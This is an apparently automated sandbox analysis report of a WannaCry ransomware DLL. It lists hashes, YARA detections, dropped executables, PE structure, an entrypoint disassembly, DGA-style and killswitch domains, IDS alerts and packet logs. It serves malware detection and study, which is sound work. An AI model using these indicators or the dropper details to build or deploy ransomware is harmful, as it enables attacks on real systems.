                  		www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comUnited States
                  		13335CLOUDFLARENETUStrue

                  Private

                  IP
                  127.0.0.1

                  General Information

                  Joe Sandbox Version:35.0.0 Citrine
                  Analysis ID:670273
                  Start date and time: 20/07/202219:36:412022-07-20 19:36:41 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 15m 51s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:HFKDS6VcNO (renamed file extension from none to dll)
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:14
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:28
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.rans.troj.evad.winDLL@18/4@2/2
                  EGA Information:
                  • Successful, ratio: 75%
                  HDC Information:
                  • Successful, ratio: 39.9% (good quality ratio 36.3%)
                  • Quality average: 76.9%
                  • Quality standard deviation: 32.2%
                  HCA Information:
                  • Successful, ratio: 78%
                  • Number of executed functions: 17
                  • Number of non-executed functions: 85
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Override analysis time to 240s for rundll32

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
                  • Excluded IPs from analysis (whitelisted): 23.35.236.56, 20.42.65.92
                  • Excluded domains from analysis (whitelisted): ldyouw.com, gefpqv.com, eaqmly.com, ypfefo.com, eekkiz.com, eaqtlo.com, lyeaew.com, fs-wildcard.microsoft.com.edgekey.net, ogggyz.com, cododi.com, loozpo.com, cxfuoy.com, ibmzei.com, yzeofb.com, mupjvv.com, atiajo.com, xaatge.com, lovzje.com, mipimr.com, vurdyj.com, ttviky.com, bnkmik.com, onedsblobprdeus17.eastus.cloudapp.azure.com, vuhaba.com, nbfpvs.com, ebalrg.com, iyvsrd.com, asesdh.com, ueercj.com, syeyep.com, uqghqa.com, yivanc.com, vpqnxj.com, emjlon.com, yurwei.com, kyivtg.com, peyuye.com, prod.fs.microsoft.com.akadns.net, zynrye.com, izuupl.com, ikgcbn.com, nuzyfp.com, ant.trenz.pl, hhvuzb.com, flcdqa.com, ybeujn.com, yuayzn.com, omxsxm.com, ayxohj.com, zaobbc.com, oktbec.com, mdrnku.com, iodilu.com, wabuqy.com, yraxyh.com, igeeyv.com, kqurib.com, faepoi.com, jrkbyt.com, watson.telemetry.microsoft.com, tdfkhn.com, ocxepi.com, fs.microsoft.com, iuwutz.com, pombmi.com, teasgj.com, logaer.com, viswai.com, yzwoea.com, cqofos.com, duomeu.com, rjajzc.com, blob
                  • Execution Graph export aborted for target tasksche.exe, PID 5936 because there are no executed function
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtWriteVirtualMemory calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  19:38:09API Interceptor1x Sleep call for process: loaddll32.exe modified
                  19:39:36API Interceptor2x Sleep call for process: svchost.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  104.16.173.80JnkyebSa2E.dllGet hashmaliciousBrowse
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                  WTU37w2UrJ.dllGet hashmaliciousBrowse
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                  FFrKRs5Q7y.dllGet hashmaliciousBrowse
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                  kFsMzLOFfN.dllGet hashmaliciousBrowse
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                  gaxuKGW0Q6.dllGet hashmaliciousBrowse
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                  1lRKsdR45K.dllGet hashmaliciousBrowse
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                  tZLWyPj8zh.dllGet hashmaliciousBrowse
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                  ffv4z4GV2N.dllGet hashmaliciousBrowse
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                  u6J827hhVw.dllGet hashmaliciousBrowse
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                  HixFSv1wxE.dllGet hashmaliciousBrowse
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                  rQJydZ0McE.dllGet hashmaliciousBrowse
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                  O9KOr4E9LK.dllGet hashmaliciousBrowse
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                  FjYNZSPNkt.dllGet hashmaliciousBrowse
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                  zZMmONZWnO.dllGet hashmaliciousBrowse
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                  HR098Ebr1z.dllGet hashmaliciousBrowse
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                  q18L3fXHcX.dllGet hashmaliciousBrowse
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                  fPFPnWqeow.dllGet hashmaliciousBrowse
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                  25HrP4nB7z.dllGet hashmaliciousBrowse
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                  qeoYR80875.dllGet hashmaliciousBrowse
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
                  0AoAuUD0hv.dllGet hashmaliciousBrowse
                  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJnkyebSa2E.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  WV7Bz2jmCx.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  WTU37w2UrJ.dllGet hashmaliciousBrowse
                  • 104.16.173.80
                  FFrKRs5Q7y.dllGet hashmaliciousBrowse
                  • 104.16.173.80
                  kFsMzLOFfN.dllGet hashmaliciousBrowse
                  • 104.16.173.80
                  BpT3BAEHhP.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  gaxuKGW0Q6.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  1lRKsdR45K.dllGet hashmaliciousBrowse
                  • 104.16.173.80
                  tZLWyPj8zh.dllGet hashmaliciousBrowse
                  • 104.16.173.80
                  ffv4z4GV2N.dllGet hashmaliciousBrowse
                  • 104.16.173.80
                  cgNiSkfqqo.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  u6J827hhVw.dllGet hashmaliciousBrowse
                  • 104.16.173.80
                  HixFSv1wxE.dllGet hashmaliciousBrowse
                  • 104.16.173.80
                  rQJydZ0McE.dllGet hashmaliciousBrowse
                  • 104.16.173.80
                  L0nkxaIRJN.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  c4hZhje8xX.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  3JaR0zYKpu.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  svRn7r2Rty.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  O9KOr4E9LK.dllGet hashmaliciousBrowse
                  • 104.16.173.80
                  FjYNZSPNkt.dllGet hashmaliciousBrowse
                  • 104.16.173.80

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  CLOUDFLARENETUSJnkyebSa2E.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  WV7Bz2jmCx.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  kFsMzLOFfN.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  BpT3BAEHhP.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  gaxuKGW0Q6.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  https://doggyorama.comGet hashmaliciousBrowse
                  • 104.17.25.14
                  tZLWyPj8zh.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  ffv4z4GV2N.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  https://my.upflowy.com/qaq-conveyor-engineering-and-manufacturingGet hashmaliciousBrowse
                  • 104.17.24.14
                  RingCentral__voice_message.htmGet hashmaliciousBrowse
                  • 104.18.10.207
                  cgNiSkfqqo.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  u6J827hhVw.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  HixFSv1wxE.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  L0nkxaIRJN.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  NuLbW6Y31T.dllGet hashmaliciousBrowse
                  • 162.158.54.184
                  c4hZhje8xX.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  3JaR0zYKpu.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  svRn7r2Rty.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  O9KOr4E9LK.dllGet hashmaliciousBrowse
                  • 104.17.244.81
                  FjYNZSPNkt.dllGet hashmaliciousBrowse
                  • 104.17.244.81

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                  Download File
                  Process:C:\Windows\System32\svchost.exe
                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xd1be2d20, page size 16384, DirtyShutdown, Windows version 10.0
                  Category:dropped
                  Size (bytes):786432
                  Entropy (8bit):0.25073978672606645
                  Encrypted:false
                  SSDEEP:384:M+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:TSB2nSB2RSjlK/+mLesOj1J2
                  MD5:A75B0FD36077AACEAFF0E9E87AB6C7F2
                  SHA1:758E164C2E346E5351146BC913A07E655E042A46
                  SHA-256:F1D3AACF8A188127DDEF3CC8E2C1BA0D61D2E12AF86C714B52F93F3668991E3D
                  SHA-512:9D2E5D160E3A90ED5B98E210F0B2ABC481FBE281353C91DACA70766A62CFB04412B83AF6F1264A3EA751406B604AA0D5CBD8CAFC7C1700E42F3A2C69C8AC9BF5
                  Malicious:false
                  Reputation:unknown
                  Preview:.- ... ................e.f.3...w........................&..........w..$'...zm.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w........................................................................................................................................................................................................................................m.$'...z..................\.3.$'...z..........................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                  Download File
                  Process:C:\Windows\System32\svchost.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):55
                  Entropy (8bit):4.306461250274409
                  Encrypted:false
                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                  Malicious:false
                  Reputation:unknown
                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                  C:\Windows\mssecsvc.exe

                  Download File
                  Process:C:\Windows\SysWOW64\rundll32.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):3751936
                  Entropy (8bit):6.541158616335863
                  Encrypted:false
                  SSDEEP:49152:OnAQqMSPbcBVQej/1INRx+TSqTdX1HkQo6SAAZ:6DqPoBhz1aRxcSUDk36SA
                  MD5:C69A376D234A2990509A077940306C82
                  SHA1:9862B3CDC643D19E2A5AAEF792B6D8D465B3FFEA
                  SHA-256:D30E4F4FE62F89E16EF6DB08CAA242C104BD7801C8141A8C4F9FD83AEA2880C1
                  SHA-512:F42820D150EA7032940AB8BD280E47BA2968D971D1F7E67A7CDF23D36ADB8E1554E1B641221DD8E164BED74F84E607E28955437374606C300F3099FDD286236E
                  Malicious:true
                  Yara Hits:
                  • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (with the help of binar.ly)
                  • Rule: WannaCry_Ransomware_Gen, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (based on rule by US CERT)
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\mssecsvc.exe, Author: Joe Security
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\mssecsvc.exe, Author: us-cert code analysis team
                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\mssecsvc.exe, Author: ReversingLabs
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Virustotal, Detection: 90%, Browse
                  • Antivirus: Metadefender, Detection: 83%, Browse
                  • Antivirus: ReversingLabs, Detection: 98%
                  Reputation:unknown
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U<S..]=..]=..]=.jA1..]=.A3..]=.~B7..]=.~B6..]=.~B9..]=..R`..]=..]<.J]=.'{6..]=..[;..]=.Rich.]=.........................PE..L......6.....................08...................@.......................... g......................................................1.. 6..........................................................................................................text.............................. ....rdata..............................@..@.data....H0......p..................@....rsrc.... 6...1.. 6.. ..............`...........................................................................................................................................................................................................................................................................................................................................................

                  C:\Windows\tasksche.exe

                  Download File
                  Process:C:\Windows\mssecsvc.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):3514368
                  Entropy (8bit):6.5250408221172975
                  Encrypted:false
                  SSDEEP:49152:nQqMSPbcBVQej/1INRx+TSqTdX1HkQo6SAAL:QqPoBhz1aRxcSUDk36SA8
                  MD5:3233ACED9279EF54267C479BBA665B90
                  SHA1:0B2CC142386641901511269503CDF6F641FAD305
                  SHA-256:F60F8A6BCAF1384A0D6A76D3E88007A8604560B263D2B8AEEE06FD74C9EE5B3B
                  SHA-512:55F25C51FFB89D46F2A7D2ED9B67701E178BD68E74B71D757D5FA14BD9530A427104FC36116633033EAD762ECF7960AB96429F5B0A085A701001C6832BA4555E
                  Malicious:true
                  Yara Hits:
                  • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly)
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Virustotal, Detection: 90%, Browse
                  • Antivirus: Metadefender, Detection: 85%, Browse
                  • Antivirus: ReversingLabs, Detection: 95%
                  Reputation:unknown
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................

                  Static File Info

                  General

                  File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):5.05346827793727
                  TrID:
                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                  • Generic Win/DOS Executable (2004/3) 0.20%
                  • DOS Executable Generic (2002/1) 0.20%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:HFKDS6VcNO.dll
                  File size:5267459
                  MD5:a653c0208aa9acb903bdb441897f8874
                  SHA1:817cbd6c8cae90d80555e1935c41adb8bcb0ba7a
                  SHA256:757f15a84e4a94e139d44d03450241f161442785d216a6220c7332edcda79539
                  SHA512:406aac2830a886086246e214c82af8de0f1936977953f983c9c4b6a44083a9931c548429b9e927fb988c2c52da3c532fe6bc52c63e7bcb0a9b7c54d8abde484a
                  SSDEEP:49152:vnAQqMSPbcBVQej/1INRx+TSqTdX1HkQo6SAAZ:/DqPoBhz1aRxcSUDk36SA
                  TLSH:A436F601D2E51AA0DAF25EF7267ADB10833A6F45895BA66E1221500F0C77F1CDDE6F2C
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.r_9...9...9.......=...9...6.....A.:.......8.......8.......:...Rich9...........................PE..L...QW.Y...........!.......

                  File Icon

                  Icon Hash:74f0e4ecccdce0e4

                  Static PE Info

                  General

                  Entrypoint:0x100011e9
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x10000000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                  DLL Characteristics:
                  Time Stamp:0x59145751 [Thu May 11 12:21:37 2017 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:2e5708ae5fed0403e8117c645fb23e5b

                  Entrypoint Preview

                  Instruction
                  push ebp
                  mov ebp, esp
                  push ebx
                  mov ebx, dword ptr [ebp+08h]
                  push esi
                  mov esi, dword ptr [ebp+0Ch]
                  push edi
                  mov edi, dword ptr [ebp+10h]
                  test esi, esi
                  jne 00007F2E9498FBDBh
                  cmp dword ptr [10003140h], 00000000h
                  jmp 00007F2E9498FBF8h
                  cmp esi, 01h
                  je 00007F2E9498FBD7h
                  cmp esi, 02h
                  jne 00007F2E9498FBF4h
                  mov eax, dword ptr [10003150h]
                  test eax, eax
                  je 00007F2E9498FBDBh
                  push edi
                  push esi
                  push ebx
                  call eax
                  test eax, eax
                  je 00007F2E9498FBDEh
                  push edi
                  push esi
                  push ebx
                  call 00007F2E9498FAEAh
                  test eax, eax
                  jne 00007F2E9498FBD6h
                  xor eax, eax
                  jmp 00007F2E9498FC20h
                  push edi
                  push esi
                  push ebx
                  call 00007F2E9498F99Ch
                  cmp esi, 01h
                  mov dword ptr [ebp+0Ch], eax
                  jne 00007F2E9498FBDEh
                  test eax, eax
                  jne 00007F2E9498FC09h
                  push edi
                  push eax
                  push ebx
                  call 00007F2E9498FAC6h
                  test esi, esi
                  je 00007F2E9498FBD7h
                  cmp esi, 03h
                  jne 00007F2E9498FBF8h
                  push edi
                  push esi
                  push ebx
                  call 00007F2E9498FAB5h
                  test eax, eax
                  jne 00007F2E9498FBD5h
                  and dword ptr [ebp+0Ch], eax
                  cmp dword ptr [ebp+0Ch], 00000000h
                  je 00007F2E9498FBE3h
                  mov eax, dword ptr [10003150h]
                  test eax, eax
                  je 00007F2E9498FBDAh
                  push edi
                  push esi
                  push ebx
                  call eax
                  mov dword ptr [ebp+0Ch], eax
                  mov eax, dword ptr [ebp+0Ch]
                  pop edi
                  pop esi
                  pop ebx
                  pop ebp
                  retn 000Ch
                  jmp dword ptr [10002028h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al

                  Rich Headers

                  Programming Language:
                  • [ C ] VS98 (6.0) build 8168
                  • [C++] VS98 (6.0) build 8168
                  • [RES] VS98 (6.0) cvtres build 1720
                  • [LNK] VS98 (6.0) imp/exp build 8168

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x21900x48.rdata
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x203c0x3c.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x500060.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x5050000x5c.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x3c.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x28c0x1000False0.13037109375data1.4429971244731552IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x20000x1d80x1000False0.072509765625data0.7346018133622799IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x30000x1540x1000False0.016845703125data0.085238686413312IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x40000x5000600x501000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x5050000x2ac0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  W0x40600x500000dataEnglishUnited States

                  Imports

                  DLLImport
                  KERNEL32.dllCloseHandle, WriteFile, CreateFileA, SizeofResource, LockResource, LoadResource, FindResourceA, CreateProcessA
                  MSVCRT.dllfree, _initterm, malloc, _adjust_fdiv, sprintf

                  Exports

                  NameOrdinalAddress
                  PlayGame10x10001114

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  192.168.2.7104.16.173.8049722802024298 07/20/22-19:38:14.180756TCP2024298ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 14972280192.168.2.7104.16.173.80
                  192.168.2.78.8.8.858715532024281 07/20/22-19:40:39.364164UDP2024281ET TROJAN Known Hostile Domain ant.trenz .pl Lookup5871553192.168.2.78.8.8.8
                  192.168.2.78.8.8.858838532012730 07/20/22-19:42:02.043613UDP2012730ET TROJAN Known Hostile Domain ilo.brenz .pl Lookup5883853192.168.2.78.8.8.8
                  192.168.2.78.8.8.852925532024281 07/20/22-19:42:33.215516UDP2024281ET TROJAN Known Hostile Domain ant.trenz .pl Lookup5292553192.168.2.78.8.8.8
                  8.8.8.8192.168.2.753494952811577 07/20/22-19:41:32.051223UDP2811577ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com)53494958.8.8.8192.168.2.7
                  192.168.2.7104.16.173.8049729802024298 07/20/22-19:40:36.366445TCP2024298ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 14972980192.168.2.7104.16.173.80
                  192.168.2.78.8.8.860996532024291 07/20/22-19:40:36.279977UDP2024291ET TROJAN Possible WannaCry DNS Lookup 16099653192.168.2.78.8.8.8
                  8.8.8.8192.168.2.753646182811577 07/20/22-19:41:09.165765UDP2811577ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com)53646188.8.8.8192.168.2.7
                  192.168.2.78.8.8.857859532024291 07/20/22-19:38:14.102838UDP2024291ET TROJAN Possible WannaCry DNS Lookup 15785953192.168.2.78.8.8.8
                  192.168.2.78.8.8.863557532012730 07/20/22-19:40:08.155803UDP2012730ET TROJAN Known Hostile Domain ilo.brenz .pl Lookup6355753192.168.2.78.8.8.8
                  104.16.173.80192.168.2.780497222031515 07/20/22-19:38:14.222408TCP2031515ET TROJAN Known Sinkhole Response Kryptos Logic8049722104.16.173.80192.168.2.7
                  104.16.173.80192.168.2.780497292031515 07/20/22-19:40:36.404548TCP2031515ET TROJAN Known Sinkhole Response Kryptos Logic8049729104.16.173.80192.168.2.7

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 20, 2022 19:38:14.163525105 CEST4972280192.168.2.7104.16.173.80
                  Jul 20, 2022 19:38:14.179990053 CEST8049722104.16.173.80192.168.2.7
                  Jul 20, 2022 19:38:14.180095911 CEST4972280192.168.2.7104.16.173.80
                  Jul 20, 2022 19:38:14.180756092 CEST4972280192.168.2.7104.16.173.80
                  Jul 20, 2022 19:38:14.197451115 CEST8049722104.16.173.80192.168.2.7
                  Jul 20, 2022 19:38:14.222408056 CEST8049722104.16.173.80192.168.2.7
                  Jul 20, 2022 19:38:14.222538948 CEST4972280192.168.2.7104.16.173.80
                  Jul 20, 2022 19:38:14.222773075 CEST4972280192.168.2.7104.16.173.80
                  Jul 20, 2022 19:38:14.239343882 CEST8049722104.16.173.80192.168.2.7
                  Jul 20, 2022 19:38:14.440079927 CEST8049722104.16.173.80192.168.2.7
                  Jul 20, 2022 19:38:14.440179110 CEST4972280192.168.2.7104.16.173.80
                  Jul 20, 2022 19:40:36.348706961 CEST4972980192.168.2.7104.16.173.80
                  Jul 20, 2022 19:40:36.365447044 CEST8049729104.16.173.80192.168.2.7
                  Jul 20, 2022 19:40:36.365560055 CEST4972980192.168.2.7104.16.173.80
                  Jul 20, 2022 19:40:36.366445065 CEST4972980192.168.2.7104.16.173.80
                  Jul 20, 2022 19:40:36.384880066 CEST8049729104.16.173.80192.168.2.7
                  Jul 20, 2022 19:40:36.404547930 CEST8049729104.16.173.80192.168.2.7
                  Jul 20, 2022 19:40:36.405972004 CEST4972980192.168.2.7104.16.173.80
                  Jul 20, 2022 19:40:36.408190966 CEST4972980192.168.2.7104.16.173.80
                  Jul 20, 2022 19:40:36.427099943 CEST8049729104.16.173.80192.168.2.7
                  Jul 20, 2022 19:40:36.627805948 CEST8049729104.16.173.80192.168.2.7
                  Jul 20, 2022 19:40:36.628382921 CEST4972980192.168.2.7104.16.173.80

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 20, 2022 19:38:14.102838039 CEST5785953192.168.2.78.8.8.8
                  Jul 20, 2022 19:38:14.126581907 CEST53578598.8.8.8192.168.2.7
                  Jul 20, 2022 19:40:36.279977083 CEST6099653192.168.2.78.8.8.8
                  Jul 20, 2022 19:40:36.303530931 CEST53609968.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:08.202572107 CEST53602808.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:08.301064968 CEST53541438.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:08.374860048 CEST53633778.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:09.083990097 CEST53623538.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:09.165765047 CEST53646188.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:09.199461937 CEST53604128.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:09.284782887 CEST53524808.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:09.324182034 CEST53541778.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:09.389641047 CEST53594758.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:09.483437061 CEST53649808.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:09.520129919 CEST53588468.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:09.595463991 CEST53529718.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:09.633013964 CEST53501258.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:10.979248047 CEST53598568.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:11.046283007 CEST53518248.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:11.159229040 CEST53652148.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:11.251528978 CEST53552458.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:11.384242058 CEST53628438.8.8.8192.168.2.7
                  Jul 20, 2022 19:41:11.486620903 CEST53505608.8.8.8192.168.2.7
